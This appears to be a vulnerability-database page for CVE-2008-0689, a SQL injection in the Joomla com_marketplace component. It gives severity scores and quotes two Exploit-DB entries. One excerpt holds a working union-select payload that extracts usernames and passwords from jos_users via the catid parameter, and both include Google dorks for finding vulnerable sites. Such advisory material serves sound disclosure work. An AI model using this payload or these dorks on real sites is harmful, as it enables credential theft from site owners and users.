CVE-2008-0689
published 2008-02-12CVE-2008-0689: SQL injection vulnerability in index.php in the Marketplace (com_marketplace) 1.1.1 and 1.1.1-pl1 component for Joomla! allows remote attackers to execute…
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.94%
56.3th percentile
SQL injection vulnerability in index.php in the Marketplace (com_marketplace) 1.1.1 and 1.1.1-pl1 component for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in a show_category action.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomla | com_marketplace | — | — |
| joomla | com_marketplace | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Joomla! Component com_marketplace 1.2.1 - 'catid' SQL Injection
exploitdb·2008-11-11
CVE-2008-0689 Joomla! Component com_marketplace 1.2.1 - 'catid' SQL Injection
Joomla! Component com_marketplace 1.2.1 - 'catid' SQL Injection
---
###########################################################
Joomla com_marketplace(catid) SQL-injection vulnerability
###########################################################
###################################################
#[~] Author : TR-ShaRk
#[~] Msn : [email protected]
#[~] Im Not Hacker
#[~] Greetz : FATAL,STR0KE,ARANELWORM,CAKI_DECCAL,CEZOHAN,WEBLOADER
#[~] Orospu Cocuklari; Elitehacker,Netshooter Kardesleri
#[!] Module_Name: com_marketplace
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"com_marketplace"
#[!] Script Download: http://download.joomlaportal.ch/images/stories/loady/komponente/com_marketplace_v131.zip
##################################################
#[~] Example:
http://localhost/Pa
Exploit-DB
Joomla! Component com_Marketplace 1.1.1 - SQL Injection
exploitdb·2008-02-03
CVE-2008-0689 Joomla! Component com_Marketplace 1.1.1 - SQL Injection
Joomla! Component com_Marketplace 1.1.1 - SQL Injection
---
############################################################################
# Joomla Component Markplace 1.1.1 Remote Sql Injection Exploit #
# #
# AUTHOR:SoSo H H (Iraqi-Cracker) #
# #
# Tested on: Markplace Version 1.1.1 and 1.1.1-pl1 #
# #
# Dork:"Marketplace Version 1.1.1" #
# "Marketplace Version 1.1.1-pl1" #
# inurl:index.php?option=com_marketplace #
############################################################################
# Exploit in: #
# index.php?option=com_marketplace&page=show_category&catid=(SQL) #
# #
# Example: #
# #
# (SQL)=-1+union+select+concat(username,0x3a,password),2,3+from+jos_users/*#
############################################################################
# Greetz: #
# L!0N,El Mariachi,My Sweet,Sh
No writeups or analysis indexed.
2008-02-12
Published